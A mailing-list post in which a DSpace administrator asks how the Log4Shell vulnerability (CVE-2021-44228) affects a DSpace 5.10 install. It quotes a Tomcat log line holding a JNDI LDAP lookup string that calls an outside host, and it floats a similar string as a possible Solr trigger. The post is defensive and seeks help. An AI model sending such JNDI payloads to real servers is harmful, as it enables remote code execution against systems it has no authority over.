Hi,
you might have recognized it since Friday: https://nvd.nist.gov/vuln/detail/CVE-2021-44228 This affects millions of sites. This is "red alert" status by the Federal Office for Information Security of Germany. We are still running a DSpace 5.10, which uses log4j in version 1.2.17 (and slf4j-log4j12-1.6.1 ?) On Friday, only version > 2.0.0 <= 2.14.1 were known to be vulnerable, today also 1.x is sort of vulnerable, but not like 2.x . I have already found a trace in the tomcat log: GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 403 - It is a 403, however a 404 would be nicer :) . It was not found in the dspace.log, however, a helping answer from someone with more in-deep-knowledge of DSpace logging could save my holiday. DSpace 7 contains log4j 2.13.3. Solr is already known to be vulnerable, but I cannot make any assumption about that based on how DSpace uses it - maybe a search with a string like {jndi:ldap://…} can trigger that. CU Michael -- All messages to this mailing list should adhere to the Code of Conduct: https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx --- You received this message because you are subscribed to the Google Groups "DSpace Technical Support" group. To unsubscribe from this group and stop receiving emails from it, send an email to dspace-tech+unsubscr...@googlegroups.com. To view this discussion on the web visit https://groups.google.com/d/msgid/dspace-tech/9b372c3dde4a47c89d55bb2a266094a2%40bibliothek.uni-kassel.de.
